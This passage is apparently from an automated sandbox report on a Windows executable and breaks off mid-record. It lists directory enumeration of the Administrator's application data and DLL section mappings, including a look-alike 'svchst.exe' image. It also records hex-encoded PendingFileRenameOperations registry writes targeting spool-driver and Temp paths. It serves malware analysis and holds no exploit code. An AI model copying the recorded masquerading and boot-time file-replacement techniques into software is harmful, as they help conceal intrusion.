C:\Documents and Settings\Administrator\Application Data\Identities\{5223274D-42A6-41C5-9E78-3A6606A65E5E} BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Identities\{5223274D-42A6-41C5-9E78-3A6606A65E5E} BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Identities BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Macromedia BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data\Macromedia BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\#SharedObjects BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\#SharedObjects BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\#SharedObjects\WT8AYZWL BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\#SharedObjects\WT8AYZWL BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\#SharedObjects\WT8AYZWL BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\#SharedObjects BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\macromedia.com BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\macromedia.com BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\macromedia.com\support BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\macromedia.com\support BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\macromedia.com\support BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\macromedia.com BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\www.macromedia.com BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\www.macromedia.com BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\www.macromedia.com\bin BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\www.macromedia.com\bin BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\www.macromedia.com\bin\fpupdateax BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\www.macromedia.com\bin\fpupdateax BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\www.macromedia.com\bin\fpupdateax BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\www.macromedia.com\bin BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\www.macromedia.com BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Macromedia BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Microsoft BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data\Microsoft BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
File Path Disposition Data Ascii Data Completion Count Source Address Symbol

Section Activities

File Path Access Type Base Size Mapped to pid Protection Completion Count
\KnownDlls\kernel32.dll write and read and execute unknown 7C800000 1007616 own pid read write success or wait 1
unknown query and write and read and execute and extend size reserve 7C800000 1007616 own pid read write success or wait 1
\NLS\NlsSectionUnicode read unknown 260000 90112 own pid readonly success or wait 1
\NLS\NlsSectionLocale read unknown 280000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortkey query and read unknown 2D0000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortTbls read unknown 320000 24576 own pid readonly success or wait 1
\NLS\NlsSectionSortkey00000409 read unknown unknown unknown unknown unknown object name not found 1
\NLS\NlsSectionSortkey00000409 read unknown unknown unknown unknown unknown object name not found 1
\KnownDlls\WS2_32.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\ws2_32.dll query and write and read and execute image 71AB0000 94208 own pid read write success or wait 1
\KnownDlls\ADVAPI32.dll write and read and execute unknown 77DD0000 634880 own pid read write success or wait 1
\KnownDlls\RPCRT4.dll write and read and execute unknown 77E70000 602112 own pid read write success or wait 1
\KnownDlls\Secur32.dll write and read and execute unknown 77FE0000 69632 own pid read write success or wait 1
\KnownDlls\msvcrt.dll write and read and execute unknown 77C10000 360448 own pid read write success or wait 1
\KnownDlls\WS2HELP.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\ws2help.dll query and write and read and execute image 71AA0000 32768 own pid read write success or wait 1
\KnownDlls\WININET.dll write and read and execute unknown 3D930000 942080 own pid read write success or wait 1
\KnownDlls\SHLWAPI.dll write and read and execute unknown 77F60000 483328 own pid read write success or wait 1
\KnownDlls\GDI32.dll write and read and execute unknown 77F10000 299008 own pid read write success or wait 1
\KnownDlls\USER32.dll write and read and execute unknown 7E410000 593920 own pid read write success or wait 1
\KnownDlls\Normaliz.dll write and read and execute unknown 330000 36864 own pid read write conflicting addresses 1
\KnownDlls\urlmon.dll write and read and execute unknown 78130000 1257472 own pid read write success or wait 1
\KnownDlls\ole32.dll write and read and execute unknown 774E0000 1302528 own pid read write success or wait 1
\KnownDlls\OLEAUT32.dll write and read and execute unknown 77120000 569344 own pid read write success or wait 1
\KnownDlls\iertutil.dll write and read and execute unknown 3DFD0000 2002944 own pid read write success or wait 1
\NLS\NlsSectionCType read unknown 350000 12288 own pid readonly success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 360000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 360000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll query and write and read and execute image 76390000 118784 own pid read write success or wait 1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll write and read and execute commit 920000 1056768 own pid execute success or wait 1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll query and write and read and execute image 773D0000 1060864 own pid read write success or wait 1
C:\WINDOWS\WindowsShell.Manifest write and read and execute commit 390000 4096 own pid execute success or wait 1
C:\WINDOWS\WindowsShell.Manifest query and read commit 390000 4096 own pid readonly success or wait 1
C:\WINDOWS\WindowsShell.Manifest read commit 390000 4096 own pid readonly success or wait 1
unknown query and write and read commit 3B0000 20480 own pid read write success or wait 1
unknown query and write and read commit 3B0000 20480 own pid read write success or wait 1
unknown query and write and read commit 3B0000 20480 own pid read write success or wait 1
unknown query and write and read commit 3B0000 20480 own pid read write success or wait 1
unknown query and write and read commit 3B0000 20480 own pid read write success or wait 1
unknown query and write and read commit 3B0000 20480 own pid read write success or wait 1
unknown query and write and read commit 3B0000 20480 own pid read write success or wait 1
\KnownDlls\SHELL32.dll write and read and execute unknown 7C9C0000 8482816 own pid read write success or wait 1
C:\WINDOWS\system32\shell32.dll read commit B20000 8462336 own pid readonly success or wait 1
\KnownDlls\comctl32.dll write and read and execute unknown 5D090000 630784 own pid read write success or wait 1
C:\WINDOWS\system32\comctl32.dll read commit B20000 618496 own pid readonly success or wait 1
\BaseNamedObjects\Local\C:_Documents and Settings_NetworkService_Local Settings_Temporary Internet Files_Content.IE5_index.dat_32768 write unknown unknown unknown unknown unknown object name not found 1
\BaseNamedObjects\Local\C:_Documents and Settings_NetworkService_Local Settings_Temporary Internet Files_Content.IE5_index.dat_32768 query and write and read commit 3E0000 32768 own pid read write success or wait 1
\BaseNamedObjects\Local\C:_Documents and Settings_NetworkService_Cookies_index.dat_16384 write unknown unknown unknown unknown unknown object name not found 1
\BaseNamedObjects\Local\C:_Documents and Settings_NetworkService_Cookies_index.dat_16384 query and write and read commit 3F0000 16384 own pid read write success or wait 1
\BaseNamedObjects\Local\C:_Documents and Settings_NetworkService_Local Settings_History_History.IE5_index.dat_16384 write unknown unknown unknown unknown unknown object name not found 1
\BaseNamedObjects\Local\C:_Documents and Settings_NetworkService_Local Settings_History_History.IE5_index.dat_16384 query and write and read commit B20000 16384 own pid read write success or wait 1
\KnownDlls\RASAPI32.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\rasapi32.dll query and write and read and execute image 76EE0000 245760 own pid read write success or wait 1
\KnownDlls\rasman.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\rasman.dll query and write and read and execute image 76E90000 73728 own pid read write success or wait 1
\KnownDlls\NETAPI32.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\netapi32.dll query and write and read and execute image 5B860000 348160 own pid read write success or wait 1
\KnownDlls\TAPI32.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\tapi32.dll query and write and read and execute image 76EB0000 192512 own pid read write success or wait 1
\KnownDlls\rtutils.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\rtutils.dll query and write and read and execute image 76E80000 57344 own pid read write success or wait 1
\KnownDlls\WINMM.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\winmm.dll query and write and read and execute image 76B40000 184320 own pid read write success or wait 1
C:\WINDOWS\system32\tapi32.dll read commit DB0000 184320 own pid readonly success or wait 1
\KnownDlls\USERENV.dll write and read and execute unknown 769C0000 737280 own pid read write success or wait 1
\KnownDlls\msapsspc.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\msapsspc.dll query and write and read and execute image 71E50000 86016 own pid read write success or wait 1
\KnownDlls\MSVCRT40.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\msvcrt40.dll query and write and read and execute image 78080000 69632 own pid read write success or wait 1
\KnownDlls\schannel.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\schannel.dll query and write and read and execute image 767F0000 163840 own pid read write success or wait 1
\KnownDlls\CRYPT32.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\crypt32.dll query and write and read and execute image 77A80000 610304 own pid read write success or wait 1
\KnownDlls\MSASN1.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\msasn1.dll query and write and read and execute image 77B20000 73728 own pid read write success or wait 1
\KnownDlls\digest.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\digest.dll query and write and read and execute image 75B00000 86016 own pid read write success or wait 1
\KnownDlls\msnsspc.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\msnsspc.dll query and write and read and execute image 747B0000 290816 own pid read write success or wait 1
\KnownDlls\MSVCRT40.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\msvcrt40.dll query and write and read and execute image 78080000 69632 own pid read write success or wait 1
C:\WINDOWS\system32\msv1_0.dll write and read and execute commit DF0000 139264 own pid execute success or wait 1
C:\WINDOWS\system32\msv1_0.dll query and write and read and execute image 77C70000 151552 own pid read write success or wait 1
\KnownDlls\cryptdll.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\cryptdll.dll query and write and read and execute image 76790000 49152 own pid read write success or wait 1
\KnownDlls\iphlpapi.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\iphlpapi.dll query and write and read and execute image 76D60000 102400 own pid read write success or wait 1
\KnownDlls\sensapi.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\sensapi.dll query and write and read and execute image 722B0000 20480 own pid read write success or wait 1
\BaseNamedObjects\SENS Information Cache read unknown DC0000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\mswsock.dll write and read and execute commit EF0000 245760 own pid execute success or wait 1
C:\WINDOWS\system32\mswsock.dll query and write and read and execute image 71A50000 258048 own pid read write success or wait 1
\KnownDlls\hnetcfg.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\hnetcfg.dll query and write and read and execute image 662B0000 360448 own pid read write success or wait 1
C:\WINDOWS\system32\wshtcpip.dll write and read and execute commit DD0000 20480 own pid execute success or wait 1
C:\WINDOWS\system32\wshtcpip.dll query and write and read and execute image 71A90000 32768 own pid read write success or wait 1
\KnownDlls\DNSAPI.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\dnsapi.dll query and write and read and execute image 76F20000 159744 own pid read write success or wait 1
C:\WINDOWS\system32\winrnr.dll write and read and execute commit DD0000 20480 own pid execute success or wait 1
C:\WINDOWS\system32\winrnr.dll query and write and read and execute image 76FB0000 32768 own pid read write success or wait 1
\KnownDlls\WLDAP32.dll write and read and execute unknown 76F60000 180224 own pid read write success or wait 1
\KnownDlls\rasadhlp.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\rasadhlp.dll query and write and read and execute image 76FC0000 24576 own pid read write success or wait 1
C:\WINDOWS\svchst.exe query and write and read and execute and extend size image 76FC0000 24576 own pid read write success or wait 1
\BaseNamedObjects\ShimSharedMemory write unknown FF0000 57344 own pid read write success or wait 1

Registry Activities

Key Path Key Value Name Completion Count Source Address Symbol
Key Path Name Type Old Data New Data Completion Count Source Address Symbol
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager PendingFileRenameOperations unicode array 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 73 00 70 00 6F 00 6F 00 6C 00 5C 00 44 00 52 00 49 00 56 00 45 00 52 00 53 00 5C 00 57 00 33 00 32 00 58 00 38 00 36 00 5C 00 33 00 5C 00 4E 00 65 00 77 00 5C 00 6D 00 64 00 69 00 75 00 69 00 2E 00 64 00 6C 00 6C 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 73 00 70 00 6F 00 6F 00 6C 00 5C 00 44 00 52 00 49 00 56 00 45 00 52 00 53 00 5C 00 57 00 33 00 32 00 58 00 38 00 36 00 5C 00 33 00 5C 00 6D 00 64 00 69 00 75 00 69 00 2E 00 64 00 6C 00 6C 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 44 00 6F 00 63 00 75 00 6D 00 65 00 6E 00 74 00 73 00 20 00 61 00 6E 00 64 00 20 00 53 00 65 00 74 00 74 00 69 00 6E 00 67 00 73 00 5C 00 41 00 64 00 6D 00 69 00 6E 00 69 00 73 00 74 00 72 00 61 00 74 00 6F 00 72 00 5C 00 41 00 70 00 70 00 6C 00 69 00 63 00 61 00 74 00 69 00 6F 00 6E 00 20 00 44 00 61 00 74 00 61 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 44 00 4F 00 43 00 55 00 4D 00 45 00 7E 00 31 00 5C 00 41 00 44 00 4D 00 49 00 4E 00 49 00 7E 00 31 00 5C 00 4C 00 4F 00 43 00 41 00 4C 00 53 00 7E 00 31 00 5C 00 54 00 65 00 6D 00 70 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 57 00 45 00 42 00 5C 00 00 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 73 00 70 00 6F 00 6F 00 6C 00 5C 00 44 00 52 00 49 00 56 00 45 00 52 00 53 00 5C 00 57 00 33 00 32 00 58 00 38 00 36 00 5C 00 33 00 5C 00 4E 00 65 00 77 00 5C 00 6D 00 64 00 69 00 75 00 69 00 2E 00 64 00 6C 00 6C 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 
00 4F 00 57 00 53 00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 73 00 70 00 6F 00 6F 00 6C 00 5C 00 44 00 52 00 49 00 56 00 45 00 52 00 53 00 5C 00 57 00 33 00 32 00 58 00 38 00 36 00 5C 00 33 00 5C 00 6D 00 64 00 69 00 75 00 69 00 2E 00 64 00 6C 00 6C 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 44 00 6F 00 63 00 75 00 6D 00 65 00 6E 00 74 00 73 00 20 00 61 00 6E 00 64 00 20 00 53 00 65 00 74 00 74 00 69 00 6E 00 67 00 73 00 5C 00 41 00 64 00 6D 00 69 00 6E 00 69 00 73 00 74 00 72 00 61 00 74 00 6F 00 72 00 5C 00 41 00 70 00 70 00 6C 00 69 00 63 00 61 00 74 00 69 00 6F 00 6E 00 20 00 44 00 61 00 74 00 61 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 44 00 4F 00 43 00 55 00 4D 00 45 00 7E 00 31 00 5C 00 41 00 44 00 4D 00 49 00 4E 00 49 00 7E 00 31 00 5C 00 4C 00 4F 00 43 00 41 00 4C 00 53 00 7E 00 31 00 5C 00 54 00 65 00 6D 00 70 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 57 00 45 00 42 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 73 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 25 00 41 00 50 00 50 00 44 00 41 00 54 00 41 00 25 00 5C 00 00 00 00 00 00 00 success or wait 1 414A20 MoveFileExA
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager PendingFileRenameOperations unicode array 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 73 00 70 00 6F 00 6F 00 6C 00 5C 00 44 00 52 00 49 00 56 00 45 00 52 00 53 00 5C 00 57 00 33 00 32 00 58 00 38 00 36 00 5C 00 33 00 5C 00 4E 00 65 00 77 00 5C 00 6D 00 64 00 69 00 75 00 69 00 2E 00 64 00 6C 00 6C 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 73 00 70 00 6F 00 6F 00 6C 00 5C 00 44 00 52 00 49 00 56 00 45 00 52 00 53 00 5C 00 57 00 33 00 32 00 58 00 38 00 36 00 5C 00 33 00 5C 00 6D 00 64 00 69 00 75 00 69 00 2E 00 64 00 6C 00 6C 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 44 00 6F 00 63 00 75 00 6D 00 65 00 6E 00 74 00 73 00 20 00 61 00 6E 00 64 00 20 00 53 00 65 00 74 00 74 00 69 00 6E 00 67 00 73 00 5C 00 41 00 64 00 6D 00 69 00 6E 00 69 00 73 00 74 00 72 00 61 00 74 00 6F 00 72 00 5C 00 41 00 70 00 70 00 6C 00 69 00 63 00 61 00 74 00 69 00 6F 00 6E 00 20 00 44 00 61 00 74 00 61 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 44 00 4F 00 43 00 55 00 4D 00 45 00 7E 00 31 00 5C 00 41 00 44 00 4D 00 49 00 4E 00 49 00 7E 00 31 00 5C 00 4C 00 4F 00 43 00 41 00 4C 00 53 00 7E 00 31 00 5C 00 54 00 65 00 6D 00 70 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 57 00 45 00 42 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 73 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 25 00 41 00 50 00 50 00 44 00 41 00 54 00 41 00 25 00 5C 00 00 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 73 00 70 00 6F 00 6F 00 6C 00 5C 00 44 00 52 00 49 00 56 00 45 00 52 
00 53 00 5C 00 57 00 33 00 32 00 58 00 38 00 36 00 5C 00 33 00 5C 00 4E 00 65 00 77 00 5C 00 6D 00 64 00 69 00 75 00 69 00 2E 00 64 00 6C 00 6C 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 73 00 70 00 6F 00 6F 00 6C 00 5C 00 44 00 52 00 49 00 56 00 45 00 52 00 53 00 5C 00 57 00 33 00 32 00 58 00 38 00 36 00 5C 00 33 00 5C 00 6D 00 64 00 69 00 75 00 69 00 2E 00 64 00 6C 00 6C 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 44 00 6F 00 63 00 75 00 6D 00 65 00 6E 00 74 00 73 00 20 00 61 00 6E 00 64 00 20 00 53 00 65 00 74 00 74 00 69 00 6E 00 67 00 73 00 5C 00 41 00 64 00 6D 00 69 00 6E 00 69 00 73 00 74 00 72 00 61 00 74 00 6F 00 72 00 5C 00 41 00 70 00 70 00 6C 00 69 00 63 00 61 00 74 00 69 00 6F 00 6E 00 20 00 44 00 61 00 74 00 61 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 44 00 4F 00 43 00 55 00 4D 00 45 00 7E 00 31 00 5C 00 41 00 44 00 4D 00 49 00 4E 00 49 00 7E 00 31 00 5C 00 4C 00 4F 00 43 00 41 00 4C 00 53 00 7E 00 31 00 5C 00 54 00 65 00 6D 00 70 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 57 00 45 00 42 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 73 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 25 00 41 00 50 00 50 00 44 00 41 00 54 00 41 00 25 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 54 00 45 00 4D 00 50 00 5C 00 00 00 00 00 00 00 success or wait 1 414A20 MoveFileExA
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager PendingFileRenameOperations unicode array 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 73 00 70 00 6F 00 6F 00 6C 00 5C 00 44 00 52 00 49 00 56 00 45 00 52 00 53 00 5C 00 57 00 33 00 32 00 58 00 38 00 36 00 5C 00 33 00 5C 00 4E 00 65 00 77 00 5C 00 6D 00 64 00 69 00 75 00 69 00 2E 00 64 00 6C 00 6C 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 73 00 70 00 6F 00 6F 00 6C 00 5C 00 44 00 52 00 49 00 56 00 45 00 52 00 53 00 5C 00 57 00 33 00 32 00 58 00 38 00 36 00 5C 00 33 00 5C 00 6D 00 64 00 69 00 75 00 69 00 2E 00 64 00 6C 00 6C 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 44 00 6F 00 63 00 75 00 6D 00 65 00 6E 00 74 00 73 00 20 00 61 00 6E 00 64 00 20 00 53 00 65 00 74 00 74 00 69 00 6E 00 67 00 73 00 5C 00 41 00 64 00 6D 00 69 00 6E 00 69 00 73 00 74 00 72 00 61 00 74 00 6F 00 72 00 5C 00 41 00 70 00 70 00 6C 00 69 00 63 00 61 00 74 00 69 00 6F 00 6E 00 20 00 44 00 61 00 74 00 61 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 44 00 4F 00 43 00 55 00 4D 00 45 00 7E 00 31 00 5C 00 41 00 44 00 4D 00 49 00 4E 00 49 00 7E 00 31 00 5C 00 4C 00 4F 00 43 00 41 00 4C 00 53 00 7E 00 31 00 5C 00 54 00 65 00 6D 00 70 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 57 00 45 00 42 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 73 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 25 00 41 00 50 00 50 00 44 00 41 00 54 00 41 00 25 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 54 00 45 00 4D 00 50 00 5C 00 00 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 
